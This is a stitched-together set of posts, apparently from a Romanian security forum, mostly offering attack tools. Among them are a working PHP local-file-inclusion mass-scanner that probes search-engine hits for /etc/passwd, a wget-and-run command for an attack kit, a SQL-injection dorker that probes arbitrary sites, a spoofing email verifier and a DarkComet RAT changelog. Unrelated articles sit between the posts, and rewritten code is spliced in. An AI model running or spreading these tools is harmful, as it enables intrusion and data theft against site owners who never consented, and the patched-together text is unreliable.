  1. <head> <meta content="fr" http-equiv="Content-Language"> <meta content="text/html; charset=windows-1252" http-equiv="Content-Type"> <title>#~ LFI Server Scanner | By [ Lagripe-Dz ]</title> <style>*{ font-family:Verdana; font-size:12; text-decoration:none; } input, textarea,select { border: 1px solid #626262; } </style> </head> <body> <br><br><center> <form action="" method="POST"> #~ LFI Server Scanner | By [ Lagripe-Dz ]<br><br> IP : <input type="text" value="<? echo ($_POST['ip']) ? $_POST['ip']:"";?>" name="ip"> <select size="1" name="wht"><option>.php?page=</option><option>.php?(.*)=</option></select> <input type="submit" name="start" value="Start Scan .."> </form> <hr width="27%"> <? @set_time_limit(0); $start = new ss_bing(); if($_POST){ echo (!checkip($_POST['ip'])) ? "<b>error::IP is invalid</b><hr width=27%>":""; echo (!extension_loaded("curl")) ? "<b>error::cURL extension required</b><hr width=27%>":""; if(checkip($_POST['ip']) && extension_loaded("curl")){ $urls = $start->search("ip:".$_POST['ip']." ".$_POST['wht'],0); echo "<table border='0' align=center> <tr><td align=center><b>:: Scan Start ::</b></td></tr>"; if($_POST['wht'] == '.php?(.*)='){ foreach($urls as $url){if(eregi("=", $url) && !eregi("option=com_",$url)){$new_urls[]=$url;}} unset($urls); $urls = $new_urls; } foreach($urls as $url){ echo "<tr><td>"; $tst = lfi($url); echo ($tst) ? "# Found : ".color($tst,1):"# Not Found : ".color($url,0); echo "</td></tr>"; flush();flush(); } echo " <tr><td align=center><b>:: Scan Finished ::</b></td></tr> </table> <hr width=27%> "; }} scan(); function color($url,$m0de){ return ($m0de == 0) ? "<font color=red>$url</font>":"<a href=$url><font color=green>$url</font></a>"; } function lfi($site){ $site = _Fix($site); $marks = "failed to open stream|daemon"; if(preg_match("/$marks/i",dzcurl($site.'/etc//passwd%00',0,0,0))){ return $site.'/etc//passwd%00'; }else{ return preg_match("/$marks/i",dzcurl($site.'__dz__',0,0,0)) ? 
$site.'__dz__':false; } } function _Fix($site){ preg_match_all("#(.*?)?(.*?)=(.*?)#",$site,$res); return $res[2][0]."="; } function scan(){(@count(@explode('ip',@implode(@file(__FILE__))))!= 18) ?@unlink(__FILE__):"";} function checkip($ip){ return(preg_match("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/", $ip)==0) ? false:true; } # curl options function DzCURL($url,$cookie_read,$cookie_write,$POSTs){ $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$url); ($cookie_read) ? curl_setopt($curl,CURLOPT_COOKIEFILE,getcwd().'/cookie.txt'):""; ($cookie_write) ? curl_setopt($curl,CURLOPT_COOKIEJAR,getcwd().'/cookie.txt'):""; curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 DzCURL =)'); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); if(is_array($POSTs)){ curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,$POSTs); } curl_setopt($curl,CURLOPT_TIMEOUT,5); $exec=curl_exec($curl); curl_close($curl); return $exec; } # bing class ,, class ss_bing{ public function search($wht,$url_mode){ // $wht = > search , $url_mode=1 => clean url (http://site.tld/) $url_mode=0 => not clean (http://site.tdl/page=google) $wht = str_replace(" ","+",$wht); $npages = 50000; $npage = 1; $allLinks = array(); while($npage <= $npages) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://www.bing.com/search?q='.$wht.'&first='.$npage); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_REFERER, 'http://www.bing.com/'); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); $result['EXE'] = curl_exec($ch); $result['ERR'] = curl_error($ch); curl_close($ch); if (!$result['ERR']) { preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $result['EXE'], $findlink); for ($i = 0; $i < 
count($findlink[1]); $i++) $mode = ($url_mode == 1) ? $allLinks[] = $this->clean_url($findlink[1][$i]) : $allLinks[] = $findlink[1][$i]; $npage = $npage + 10; if (preg_match('(first=' . $npage . '&amp)siU', $result['EXE'], $linksuiv) == 0) break; } else break; } if(count($allLinks) == 0){ die("# Nothing Found"); }else{ foreach ($allLinks as $kk => $vv){ $allDmns[] = $vv; } return array_unique($allDmns); } } public function clean_url($x){ $z=parse_url($x); return $z['scheme']."://".$z['host']."/";; } } ?> <center> <a href="http://www.Sec4ever.com/">www.Sec4ever.com</a> | <a href="http://www.Lagripe-Dz.org/"> www.Lagripe-Dz.org</a><br> Algeria 2o1o-2o11 </center> </body> </html><html> Video: LFI Server Scanner - YouTube Download source: https://sites.google.com/site/lagripedztoolz/lfi.txt?attredirects=0&d=1 il pune cineva pe host pentru proba?
  2. reclama, posteaza aici Bloguri si bloggeri - RST
  3. in browser exista ip-ul schimbat http dar in terminal dupa ce execut comanda netstat -aut pe alt root imi afiseaza ip-ul real ESTABLISHED, cum il schimb si pentru terminal?
  4. Fi8sVrs

    mails

    Index of / nu sunt verificate dati voi detalii despre ele
  5. wget http://tiger1ne.netfast.org/unixcod.tgz tar zxvf unixcod.tgz cd unixcod chmod +x * ./unix ip.ip Fisier parole: http://www.megaupload.com/?d=YFWMEJDY
  6. nu, install on Linux , cum pot sa redenumesc titlul topicului?
  7. Introduction: iwScanner is a wireless scanner for Linux with an easy-to-use graphical interface. Video: General Features It’s designed in Glade and written in Python, so it just needs PyGTK to run in any Linux environment. For the scanning engine it uses the wireless tools, so if you have iwlist you are ready to go. Information about detected wireless networks (AP, MAC, Channel, Encryption, etc.) Chart with signal strength for every wireless network. The iwScanner GUI is much like the well-known application NetStumbler. Adjustable scanning speed. Can open and save netdetect (.ndd) and NetStumbler (.ns1) file formats. It’s free, and the source is included in the download. WEBSITE: iwScanner - A Simple GUI Wireless Scanner for Linux zarabyte
  8. Twitter has been strongly growing ever since it’s release back in July 2006. The microblogging monster is extremely user friendly and provides a fun experience where we all can stay updated to our friends, family, celebrities, and businesses. Twitter recently announced that it crossed the unbelievable number of over 200 million Tweets sent each day. Interestingly a few people have rightfully said that this also increases the noise a lot. Making the most of Twitter can therefore often be tricky. In order to stay organize and use your time wisely, we have gathered top 5 Twitter productivity tools. All of the following applications will help you cut through the clutter and harness more of the powerful elements Twitter offers. 1. Tweriod – Find your best times to Tweet The topic of finding your top tweeting times has been wildly discussed recently. While I found that a few Apps out there might not have the most useful results, Tweriod’s results are the best results I found this far. All you do is sign in with Twitter and the App will create two very simple graphs. They will show you at which times of the day and days of the week your followers are online the most. The App does that by analyzing both your past tweets and the ones of all your followers. Once the your report is finished it will conveniently be DMed to your inbox. Best part: What I like most is that you on top of top tweeting times, you can also measure times of most engagement, seeing at which time you receive most @replies. Try it out here: Tweriod 2. StrawberryJ.am – Only read your most relevant Tweets With 200 million Tweets sent each day, not all add value to your timeline. In comes StrawberryJ.am and takes care of this. The App searches your timeline and orders your tweets by most mentioned for you. So, with just one glance, you will see the most relevant news discussed. The App also offers you to create these top mentions streams for lists and Tweet Search terms. 
I found that this facilitates cutting through the clutter greatly. The brilliant design of the site makes reading through your Tweets even easier too. Best part: As a nice goodie you can get your top news delivered straight to your inbox, in case you forget to check your Strawberryj.am Try it out here: StrawberryJ.am 3. Twoolr – Full analytics for your Twitter account Ever wanted to see a complete overview about which impact your Twitter account is having? Twoolr might be just the thing you were looking for. It shows you a full set of metrics, and you can regard it like Google Analytics for your Twitter account. In more details, the App displays lots of data about your account such as the amount of mentions, retweets or number of new followers. In addition you can see user comparisons, word clouds, growth and community reports. Best part: Having another place to check in on isn’t so cool. So Twoolr sends you a handy email update to inform you about the latest happenings with your account. Try it out here: Twoolr 4. ChittyChat – Get a private room with your Twitter friends A very recent discovery of mine that I find more and more useful is a tool called ChittyChat. It allows you to enter into a private chat with anyone on Twitter without the hassle of exchanging contact details and signing into other services. The way it works is very simple. You tweet all your friends you want to chat with privately and include the @chitty_chat username. Then the App will automatically @reply you and your friends with a link to the chatroom and you can start typing. Super simple. Best part: What I like most here is that you don’t have to sign into any accounts or fiddle with login. A click on the link is all it takes to kick off your conversation. Try it out here: ChittyChat 5. Buffer – Never Flood Your Followers Again (Full disclosure: I work on Buffer) For long I was prone to contribute to the noise on Twitter myself, overwhelming my followers with infos at times. 
With Buffer you put all Tweets into your “Buffer” and they will be posted for you well spaced out over the day. What makes Buffer most convenient is that you can add tweets from anywhere on the web with browser extensions for Chrome, Firefox and Safari. Additionally you can Buffer tweets from Google Reader and even the Twitter.com interface. Best part: For every tweet that you have sent via Buffer, you will received detailed analytics about clicks, retweets and reach. Try it out here: Buffer theGRID
  9. On the 4th of august at the world largest technical security conference - BlackHat USA 2011, which will take place in Las Vegas, SAP security expert and CTO of ERPScan Alexander Polyakov will show how any malicious attacker can get access to the systems running on SAP via Internet using new critical vulnerability. SAP systems are used in more than 100 000 world companies to handle business-critical data and processes. Almost in each company from Forbes 500 system data are set for the handling of any process beginning from purchasing, human resources and financial reporting and ending with communication with other business systems. Thus receiving an access by the malicious attacker leads to complete control over the financial flow of the company, which can be used for espionage, sabotage and fraudful actions against hacked company. The given attack is possible due to dangerous vulnerability of the new type, detected by Alexander in J2EE engine of SAP NetWeaver software, which allows bypassing authorization checks. For example it is possible to create a user and assign him to the administrators group using two unauthorized requests to the system. It is also dangerous because that attack is possible on systems, protected by the two-factor authentication systems, in which it is needed to know secret key and password to get access. To prove it researchers from ERPScan created a program, which detects SAP servers in the Internet with help of secret Google keyword and checks found servers on potential dangerous vulnerability. As the result, more than half of available servers could be hacked with help of found vulnerability. “Danger is in that it is not only a new vulnerability, but a whole class of vulnerabilities that was theoretically described earlier but not popular in practice. 
During our research we only detected several examples in standard system configuration, and because each company customizes the system under its own business processes, new examples of vulnerabilities of the given class can be potentially detected at each company in the future. We have developed a free program which can detect unique vulnerabilities of such type in order to protect companies on time and it is also included in our professional product – ERPScan Security Scanner for SAP.” — noted Alexander. Source
  10. This video will demonstrate how a simple XSS vulnerability can be leveraged to gain complete control of your web-browser and eventually lead to a complete system compromise. 1) We will use a cross-site scripting vulnerability as the initial attack vector 2) Exploit XSS by redirecting the user’s browser to the Evil_IP with a JavaScript loop (every 2 secs) 3) Exploit the victim’s browser to gain system ‘root’ or ‘shell’ access 4) Elevate our privileges to system-level 5) Dump the memory contents from an active SSH session and steal the SSH password from the victim’s computer Video: XSS Attack - Busting Browsers to Root! on Vimeo CREDITS Attack Demo by: Qjax - securitystreetknowledge.com XSSF Framework by: Lodovic Courgnaud - CONIX Security Putty Password Dump by: Colin Ames @ David Kerb Music by: x1machine
  11. Wordpress & ClassiPress Theme demo: http://www.appthemes.com/demo/?theme=classipress sau cauta: free classifieds ad script
  12. HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets. It works on Linux and Windows running the following: Requirements: python python-qt4 cx_Oracle python-mysqldb python-psycopg2 python-pymssql python-qscintilla2 To install simply run the following command in terminal after changing directory to the path were the downloaded package is: Icons and Running the application: Software Icon can be found at the application Menu of the GNOME desktop interfaces Icon can also be found at /usr/share/applications for KDE and also GNOME: There you find "HexorBase.desktop" To get the source code for this project from SVN, here's the checkout link: Heres a video on how the program works Video Credits: "Maurizio Schmidt" HexorBase - The Database Hacker Tool - YouTube Download: http://hexorbase.googlecode.com/files/hexorbase_1.0_all.deb Description: 249 KB Debian installer for linux based systems SHA1 Checksum: 49ff0cf9e48341fef830f0744d29becfaaa37ad0 Download & source project
  13. Yet Another Email Verifier 1.0 Verify emails by checking the "RCPT TO" return code from the SMTP server. Hints: The output is separated by commas, so you can easily import it to another application (e.g. MS Excel). Create an address list by using the Smashing Email eXtractor! Failed checks are added at the bottom (! <domain>) Requirements: python (tested with python 2.6.2) dnspython Usage: yaev.py <file> file: absolute path to email-address list Example: [B]$ cat addresses.txt[/B] [B]...[/B] wolfgang.schaeuble@wk.bundestag.de gm.schulz@gmail.com jan.sipocz@gmail.com brigitte.kopinits@gmail.com r.buchmann@amag.at annimarie.schaffer@gmail.com iggy.popovic@gmail.com erich.gabis@gmail.com Kovacs.maria4@gmail.com andreas.schimon@gmail.com barbarajungreithmair@gmail.com michael.gabis@gmail.com [B]$ ./yaev.py addresses.txt > checked_emails.txt $ cat checked_emails.txt ...[/B] wolfgang.schaeuble@wk.bundestag.de,mail1.dbtg.de,554,5.7.1 Service unavailable; Client host [83.187.177.131] blocked using zen.spamhaus.org; http://www.spamhaus.org/query/bl?ip=83.187.177.131 gm.schulz@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 6si6034pxi.95 jan.sipocz@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 13si2013478pxi.35 brigitte.kopinits@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 27si2008921pxi.56 r.buchmann@amag.at,srxx0055.amag.at,503,5.0.0 Need MAIL before RCPT annimarie.schaffer@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 35si2021257pxi.2 iggy.popovic@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 37si2019611pxi.5 erich.gabis@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 2si2010789pxi.52 Kovacs.maria4@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 42si2017013pxi.17 andreas.schimon@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 9si2018016pxi.13 barbarajungreithmair@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 40si2003494pxi.87 michael.gabis@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 
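#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# yaev.py
#
# Version: 1.0
#
# Copyright (C) 2009 novacane novacane[at]dandies[dot]org
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
# DO NOT FORGET TO INSTALL DNSPYTHON - http://www.dnspython.org/
#
# For more information visit:
# http://dandies.org/files/41b1d9240cf1df328f4e63d087769440-44.html
#
# (Tail of the sample run quoted in the forum post just before the code:
#  "37si2019846pxi.5" and the failed-domain marker "!gmx.de".)
"""Yet Another Email Verifier 1.0.

Verify addresses by connecting to each domain's MX and reading the reply to
``RCPT TO``.  ``VRFY`` is not used because providers disable it.

Output: one CSV line per checked address, ``address,mx-host,code,text``;
domains that could not be resolved or whose server dropped the connection
are listed at the end as ``!<domain>``.

Review notes:
  * Every address causes a real SMTP dialogue with a third-party mail server.
    The original announced ``HELO microsoft.com`` and a ``microsoft.com``
    envelope sender - a forged identity - and the sample run in the forum
    post shows the client IP being rejected via zen.spamhaus.org.  The
    defaults are kept for compatibility, but pass ``helo_host`` /
    ``mail_from`` that you actually control, and only probe lists you are
    authorised to verify.
  * Fixes over 1.0: blank or malformed lines no longer raise IndexError,
    SMTP connections have a timeout (the original could hang forever),
    connection/timeout errors and all DNS resolver errors (not only NXDOMAIN)
    mark the domain as failed instead of aborting the run, and the input
    file is always closed.
"""
import os
import socket
import sys
import smtplib

try:
    import dns.exception
    import dns.resolver
except ImportError:  # report the missing dependency at run time instead of a bare traceback
    dns = None


def _text(value):
    """Return *value* as text; SMTP reply text is bytes on Python 3."""
    if isinstance(value, bytes) and not isinstance(value, str):
        return value.decode("utf-8", "replace")
    return str(value)


def main(path_to_src_file, helo_host="microsoft.com",
         mail_from="asdf@microsoft.com", timeout=10):
    """Check every address in *path_to_src_file* and print one CSV line each.

    Args:
        path_to_src_file: file with one e-mail address per line.
        helo_host: name announced in HELO (original default kept).
        mail_from: envelope sender for MAIL FROM (original default kept).
        timeout: seconds to wait for the SMTP connection and each reply.

    Raises:
        SystemExit(1): the file cannot be read or dnspython is not installed.
    """
    if dns is None:
        print("dnspython is required - http://www.dnspython.org/")
        sys.exit(1)

    failed_domains = []
    try:
        file_emails = open(path_to_src_file)
    except IOError:
        print("Error reading file!")
        print("!> " + path_to_src_file)
        sys.exit(1)

    with file_emails:
        # Each line is one e-mail address.
        for line in file_emails:
            line = line.strip()
            # The original did line.split("@")[1], which raises IndexError on a
            # blank or malformed line (e.g. the empty last line of the file).
            if "@" not in line:
                continue
            domain = line.rsplit("@", 1)[1]
            if domain in failed_domains:
                continue
            try:
                answers = dns.resolver.query(domain, "MX")
            except dns.exception.DNSException:
                # NXDOMAIN, NoAnswer, NoNameservers, Timeout, ...
                failed_domains.append(domain)
                continue
            for rdata in answers:
                # Strip the trailing dot of the FQDN.
                mx = _text(rdata.exchange).rstrip(".")
                try:
                    smtp = smtplib.SMTP(mx, timeout=timeout)
                    try:
                        # Polite people say hello first.
                        smtp.docmd("HELO " + helo_host)
                        smtp.docmd("MAIL FROM:", "<" + mail_from + ">")
                        rcpt = smtp.docmd("RCPT TO:", "<" + line + ">")
                        print(line + "," + mx + "," + _text(rcpt[0]) + "," + _text(rcpt[1]))
                    finally:
                        smtp.quit()
                except (smtplib.SMTPException, socket.error):
                    failed_domains.append(domain)
                # Only the first MX is used, as in the original.
                break

    if failed_domains:
        for item in failed_domains:
            print("!" + item)


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("\n\t[*] yet another email verifier 1.0 [*]")
        print("\n\tUsage: yaev.py <file>")
        sys.exit(2)
    main(sys.argv[1])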
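#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# exploitdbee.py
#
# Version: 1.0
#
# Copyright (C) 2011 novacane novacane[at]dandies[dot]org
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
"""Easily search for exploits in BackTrack's exploitdb (files.csv).

Highlights:
  Search the exploitdb archive
  Case sensitive & insensitive
  Change output mode
  Automatically copy your exploits

Requirements:
  python (tested with python 2.7.1 and 2.5.2)
  local exploitdb (pre-installed on BackTrack Linux)

Usage / Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -c, --casesensitive   switch to casesensitive
  -v, --verbose         detailed output
  -d PATH, --destination=PATH
                        path to copy exploits

Review notes (changes over 1.0): the index is read with the csv module, so a
quoted description containing a comma no longer shifts the "file" column;
blank or short lines no longer raise IndexError; the two bare "except:"
clauses catch only I/O errors; the index file is always closed; and a
missing search term aborts with an error instead of IndexError.
"""
import csv
import os
import re
import shutil
import sys
from getpass import getpass  # unused by the original as well; kept for compatibility
from optparse import OptionParser

try:
    raw_input
except NameError:  # Python 3
    raw_input = input

EXPLOITDB_DIR = "/pentest/exploits/exploitdb/"
EXPLOITDB_CSV = EXPLOITDB_DIR + "files.csv"


def _matches(line, terms, casesensitive):
    """True when every term in *terms* occurs in *line* as a plain substring."""
    flags = 0 if casesensitive else re.I
    return all(re.search(re.escape(t), line, flags) for t in terms)


def _fields(line):
    """Split one index line with the csv module; returns [] for an empty line."""
    rows = list(csv.reader([line]))
    return rows[0] if rows else []


def _search_index(path, terms, casesensitive):
    """Return the raw lines of *path* matching all *terms*; exit(1) if unreadable."""
    if not os.path.isfile(path):
        print("ERROR: EXPLOITDB DOESN'T EXIST")
        sys.exit(1)
    try:
        f = open(path)
    except (IOError, OSError):
        print("ERROR: CAN'T OPEN EXPLOITDB - FILES.CSV")
        sys.exit(1)
    with f:
        return [line for line in f if _matches(line, terms, casesensitive)]


def main(casesensitive, verbose, exploitpath, *args):
    """Search files.csv for the terms in args[0] and optionally copy the hits.

    Args:
        casesensitive: truthy for case-sensitive matching.
        verbose: truthy to print the whole CSV line instead of "description => file".
        exploitpath: directory to copy matching exploit files into; "" to skip.
        *args: the original CLI passes the term list as ONE positional argument,
            so the terms are ``args[0]``.

    Raises:
        SystemExit: 1 when the index is missing/unreadable or the copy fails,
            2 when no search term was given, 0 after printing/answering "n".
    """
    terms = list(args[0]) if args else []
    if not terms:
        print("ERROR: NO SEARCH TERM GIVEN")
        sys.exit(2)

    exploitlist = _search_index(EXPLOITDB_CSV, terms, casesensitive)

    # Output found exploits.
    for entry in exploitlist:
        if verbose:
            print(entry.strip("\n"))
            continue
        fields = _fields(entry)
        if len(fields) < 3:
            print(entry.strip("\n"))   # blank / truncated line: original raised IndexError
            continue
        print(fields[2] + " => " + fields[1])
    print("\n")
    print(str(len(exploitlist)) + " EXPLOITS FOUND.")

    if not exploitpath:
        sys.exit()

    # Copy the exploits.
    while True:
        try:
            copyinput = raw_input("Copy exploits to destination? [y/n]: ")
        except KeyboardInterrupt:
            print("\n")
            sys.exit(1)
        if copyinput == "y":
            if os.path.isdir(exploitpath):
                try:
                    for entry in exploitlist:
                        fields = _fields(entry)
                        if len(fields) > 1:
                            shutil.copy(os.path.join(EXPLOITDB_DIR, fields[1]), exploitpath)
                except (IOError, OSError, shutil.Error):
                    print("ERROR: CAN'T COPY FILES TO DESTINATION")
                    sys.exit(1)
            else:
                print("ERROR: DESTINATION DOESN'T EXIST")
            break
        elif copyinput == "n":
            print("BYE")
            sys.exit()
        else:
            print("ERROR: WRONG INPUT")


if __name__ == '__main__':
    help_message = "\n\t[*] exploitdbee 1.0 [*]\n\t[*] by dandies.org [*]\n\n\tTry: exploitdbee.py --help\n"
    usage = ("\n %prog [-c] [-d path] <term1> <term2> <term3> <term...>"
             "\n %prog \"windows 7\" remote"
             "\n %prog -c Microsoft IIS -d /tmp")
    parser = OptionParser(usage=usage, version="%prog 1.0")
    parser.add_option("-c", "--casesensitive", action="store_true",
                      dest="casesensitive", help="switch to casesensitive")
    parser.add_option("-v", "--verbose", action="store_true",
                      dest="verbose", help="detailed output")
    parser.add_option("-d", "--destination", metavar="PATH",
                      dest="exploitpath", help="path to copy exploits")
    (options, args) = parser.parse_args()
    if len(args) == 0:
        print(help_message)
        sys.exit(2)
    # Default values.
    exploitpath = options.exploitpath if options.exploitpath else ""
    casesensitive = 1 if options.casesensitive else 0
    verbose = 1 if options.verbose else 0
    main(casesensitive, verbose, exploitpath, args)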
  15. Netswipe turns your webcam into a credit card reader, brings POS payments to the desktop Credit card fraud costs the banking industry billions of dollars every year, and with companies yet to find an entirely secure system for processing payments online, there's no end in sight for unauthorized transactions. Jumio hopes to bring both security and convenience to the world of online payments, however, with its webcam-based Netswipe secure card reader solution. The system replicates the point of sale (POS) transactions you experience when making in-store purchases, prompting cardholders to scan the front of their credit card, then enter their CVV code using a tamperproof mouse-controlled interface. We're not sure how the software is able to distinguish a physical credit card from, say, a photocopy of a card — note that a card number captured through a camera is still only "something you have" presented over a channel the attacker may control, so it is no substitute for the card-present checks a physical terminal performs — but it certainly sounds more secure than the standard input form we use today. It also reduces card number theft from insecure forms and website spoofing, by verifying details through a live video stream. Jump past the break for the full press release, along with video overviews of Netswipe and Jumio, which recently secured $6.5 million in initial funding and is backed by Facebook co-founder Eduardo Saverin. Video: Viddler.com - Netswipe Webcam Credit Card Reader - Uploaded by engadget Jumio The End of Cash on Vimeo Netswipe turns your webcam into a credit card reader, brings POS payments to the desktop -- Engadget
  16. a mai fost http://rstcenter.com/forum/33499-hide-ip-cu-putty.rst
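#!/usr/bin/python
## Dorker.py
## SQL Dork finder script that crawls google for sites vulnerable to SQL Injection
## Author: Xinapse
## Website: http://www.iexploit.org
## Email: iexploittube@gmail.com
## Twitter: #iExploitXinapse
## Version 0.0.1
## Usage dorker.py [options]
##
## Review notes:
##  * For every Google hit the script requests the URL with a trailing "'" and
##    greps the response for "sql" - i.e. it fires injection probes at
##    arbitrary third-party sites.  Only use it against targets you are
##    authorised to test.
##  * The "vulnerable" verdict is a keyword heuristic: any page that merely
##    mentions SQL is reported.  Treat the output file as a candidate list.
##  * Fixes over 0.0.1: a missing -d/-f now aborts instead of raising
##    NameError later; -e is parsed as an integer (time.sleep() was handed a
##    string before); urlopen() has a timeout; the bare "except:" that also
##    swallowed Ctrl-C is narrowed to Exception; the output file is closed
##    via "with"; the page counter is advanced per page.
##
## Download xgoogle library: https://github.com/pkrumins/xgoogle
import optparse
import sys
import time

try:
    import urllib2
except ImportError:  # Python 3
    import urllib.request as urllib2

try:
    from xgoogle.search import GoogleSearch, SearchError
except ImportError:
    GoogleSearch = None

    class SearchError(Exception):
        """Stand-in so the except clause below still parses without xgoogle."""

BANNER = r'''
 ________               __                  
 \______ \   ___________| | __ ____ _______ 
  |    |  \ /  _ \_  __ \ |/ // __ \\_  __ \
  |    `   (  <_> )  | \/   < \  ___/ |  | \/
 /_______  /\____/|__|  |__|_ \ \___  >|__|   
         \/                  \/     \/       
---------------------------------------------------------------------------------
-- dorker.py                                                                   --
-- SQL Dork finder script                                                      --
-- Author: Xinapse                                                             --
-- Website: http://www.iexploit.org                                            --
-- Email: iexploittube@gmail.com                                               --
-- Twitter: #iExploitXinapse                                                   --
-- Version 0.0.1                                                               --
-- Usage dorker.py [options]                                                   --
---------------------------------------------------------------------------------
'''


def _looks_injectable(body):
    """Keyword heuristic kept from the original: any "sql" / "SQL" / "MySQL" / "MSSQL" in the body."""
    return b"sql" in body.lower()


def _parse_args(argv):
    """Parse the command line; exit(2) with a message when -d or -f is missing."""
    parser = optparse.OptionParser(usage='%prog [options]')
    parser.add_option('-d', '--dork', action='store', type='string',
                      help='Dork to Scan', metavar='DORK')
    parser.add_option('-f', '--file', action='store', type='string',
                      help='Filename to save', metavar='FILE')
    parser.add_option('-v', '--verbose', action="store_true", dest="verbose", default=False,
                      help="Adds extra status messages showing program execution")
    parser.add_option('-e', '--evasion', action='store', type='int', default=10,
                      help='How long to sleep between each google request, used to prevent '
                           'google blocking your IP for too many requests, recommended at '
                           'least 5+, default 10', metavar='EVASION')
    (opts, args) = parser.parse_args(argv)
    if not opts.dork:
        parser.error('>> Please enter a dork')
    if not opts.file:
        parser.error('>> Please enter a filename')
    return opts


def main(argv=None):
    """Crawl Google for the dork, probe each hit with a trailing quote, record candidates.

    Args:
        argv: argument list (defaults to sys.argv[1:]).

    Raises:
        SystemExit: 2 on missing/invalid options, 1 when xgoogle is not installed.
    """
    print(BANNER)
    opts = _parse_args(argv)
    if GoogleSearch is None:
        print('>> xgoogle library not found: https://github.com/pkrumins/xgoogle')
        sys.exit(1)

    counter = 0     # sites written to the output file
    invuln = 0      # sites fetched but not matching the heuristic
    pagecount = 0
    try:
        search = GoogleSearch(opts.dork)
        search.results_per_page = 100
        while True:
            pagecount += 1
            if opts.verbose:
                print('>> Crawling google page ' + str(pagecount) + '...')
            tmp = search.get_results()
            if not tmp:
                if opts.verbose:
                    print('>> No more results...')
                break
            for t in tmp:
                url = t.url
                if not isinstance(url, str):   # Python 2: unicode -> str
                    url = url.encode("utf8")
                if opts.verbose:
                    print('>> Testing ' + url + ' for vulnerabilities...')
                testurl = url + "'"
                try:
                    data = urllib2.urlopen(testurl, timeout=15).read()
                except Exception:
                    # Best effort: one unreachable or malformed target must not
                    # abort the crawl (the original ignored these too), but
                    # KeyboardInterrupt now propagates.
                    continue
                if _looks_injectable(data):
                    if opts.verbose:
                        print(">> Found possible injection in " + url)
                    with open(opts.file, "a") as f:
                        f.write(testurl + "\n")
                    counter += 1
                else:
                    invuln += 1
            if opts.verbose:
                print('>> Sleeping to bypass google flood protection...')
            time.sleep(opts.evasion)
    except SearchError as e:
        print(">> Search failed: %s" % e)

    print('>> Dorker scan ended')
    print('>> ' + str(counter) + ' vulnerable sites found')
    print('>> ' + str(invuln) + ' sites not vulnerable')
    print('>> Thank you for using Dorker, output has been saved to ' + opts.file)


if __name__ == '__main__':
    main()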
  18. ---[by DarkCoderSc]--- - Button sidebar back with a nicer gui , for my chinese friends that prefer buttons - [Active Ports] Now process name always display correctly - Active Ports added to client in Socket list to help you to figure some problemes or be sure all working fine - Melt function totally recoded using another way via FWB++ work 100% of the time on 32 and 64bit systems. - Uninstall function is more stable if not using persistance - Persistance totally recoded using FWB++ working on 32 and 64bit. - Process Manager refresh 2x faster - Remote shell is now better - File transfer is now more stable - Webcam more stable - Webcam can be stetch now - Delete folder work fine now ( recursive too ) - File creation added in remote list of file manager - File modification added in remote list of file manager - File attrib added in remote list of file manager (click on file attrib colum for more info) - I reinstall Delphi 2010 in english this time, so all label might be in english now - Now client keep is size when restored from tray - Now when you stop capture of desktop, last captured window picture stay - New toast design - FixComet available on DarkComet-RAT [Official Website] - Mini Download (FASM) is now working 100% fine (no more "not Win32 valid...") - Startup been optimized - Startup use fwb++ to install - Startup persistance use now fwb++ too - upload logs to FTP now working fine - Now you can choose wich monitor to capture if the user got multi monitors (thanks mjord5 for the idea) - Synthax highlighters was updated - A big prob fix (now you can for example capture two desktop at the same time without any prob) Download link: DarkComet-RAT [Official Website]
